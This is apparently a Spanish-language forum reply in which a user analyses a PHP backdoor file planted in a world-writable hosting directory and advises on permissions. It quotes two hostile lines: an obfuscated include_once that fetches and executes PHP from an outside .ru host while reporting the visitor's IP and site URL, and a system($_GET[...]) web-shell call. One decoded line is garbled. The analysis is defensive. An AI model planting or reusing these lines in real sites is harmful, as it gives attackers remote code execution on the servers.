¿ Como se pudieron grabar los Archivos en ese directorio ?
Es por que tienen permisos 777, es decir cualquier usuario o grupo pueden acceder a ese directorio . Yo creo que con permisos 700 (solo el USER puede leer y escribir y ejecutar) pero talvez el interprete de php no se si pueda con acceso 700 , tienes que probar.
Algun user/cuenta de tu hosting, grabo esos archivos en tu Directorio.
Respecto al primer archivo
date.php
Para su correcto funcionamiento, este script necesita alguna variables que se le entregan via get.
Considero muy peligrosa esta linea
Código:
include_once (base64_decode("aHR0cDovL2Jpcy5pZnJhb WUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg);
Ya que lo que intenta es incluir ( es decir ejecutar ) una URL externa, esta URL externa si imprime codigo PHP, este codigo se ejecutaria, en fin la URL contiene datos que son codificados, en mi server, lo que esta ofuscado es algo como esto en mi caso
Código:
http://bis.ifrao唹ÉÔ½µ…ÍѕȹÁ¡ÀýÉ}…‘‘È3232235877&url=ZGVlcm1lL3Rlc3QvdGVzdC5waHA=
Ahora esto esta dentro de un if, si no se ejecuta, pasa a la linea
( q creo que la peor linea ) es esta (system($_GET["a3kfj39fsj2"]); ) ya que ejecuta un comando que se le envia via post, lo cual es muy peligroso
Mas rato veo el date.php
Lo otro, si pudieras ejecutar el date.php pero envez de include_once pones un echo , para ver que URL te imprime a ti
PD : Yapoz viejos del PHP, miremos este codigo, ya que al amigo de un momento para otro tiene este codigo en tu cuenta en el hosting.
Saludos